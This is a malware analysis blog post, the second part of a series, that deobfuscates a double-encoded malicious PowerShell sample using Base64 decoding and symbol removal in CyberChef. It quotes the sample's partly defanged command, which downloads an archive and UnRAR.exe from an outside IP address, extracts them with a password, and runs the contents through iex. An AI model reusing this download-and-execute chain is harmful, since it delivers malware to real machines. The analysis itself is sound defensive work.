Analysis Second Stage of Double Encoded Malicious Powershell

 

In the previous article, we talked about analyzing a double-encoded PowerShell file. Simply put, when you try to decode the code, it gives you the same code as the first one, and when you decode the second code, it gives you the real code. What struck me about this sample is . This code does not download an executable file, but downloads another stage of encoded PowerShell code. There it downloads the final stage, which is an executable file.

Read Part 1 : https://reversethemalware.blogspot.com/2025/07/analysis-double-encoded-malicious.html

Great if you're done reading the first part! In the first code, the developer downloads a RAR file and then extracts it from the RAR. You can see the code below:

Invoke-WebRequest -Uri "http[://]95.164.55.39/main/glh/yhgdv8[.]rar" -OutFile "$env:TEMP\yhgdv8.rar"; iwr -Uri "]http:]//[95.]164.55.39/UnRAR[.]exe" -OutFile "$env:TEMP\UnRAR.exe"; Start-Process -NoNewWindow -FilePath "$env:TEMP\UnRAR.exe" -ArgumentList "x", "-pvPNTfmDk9jjofeD", "-o+", "$env:TEMP\yhgdv8.rar", "$env:TEMP"; Start-Sleep -Seconds 4; Get-Content "$env:TEMP\yhgdv8.txt" | iex;

Then I tried to find out what was in the text file, I suspected it must be PowerShell, I'm glad that my interpretation was not wrong and what was in the TX file was a different encoded PowerShell. We will explain the difference in this article. You can look at the picture below to see the difference:

In this version of PowerShell code, we notice that the attacker has used Base64 again. But if we look at the replace part of the code: $kls.Replace('^', ''))) We see that the attacker uses symbolic obfuscation to complicate the decoding. The solution to this problem is very easy. Just copy the encoded code and then Ctrl + F in Notepad and then paste the Find symbol and do not put anything in the Replace section and it will clean itself and in Cyber Chef you can use the Find / Replace operation that does the same thing in Notepad.

Now we will decode the first part of the code through CyberChef. After we remove the symbol. For the decoding method. Paste the encoded code on the right-hand side of CyberChef and select From Base64 from the operation section :

And then to the second line of the encoded code. We will repeat the same process. But be careful not to Find / Replace for the second line ! Because it is not used there .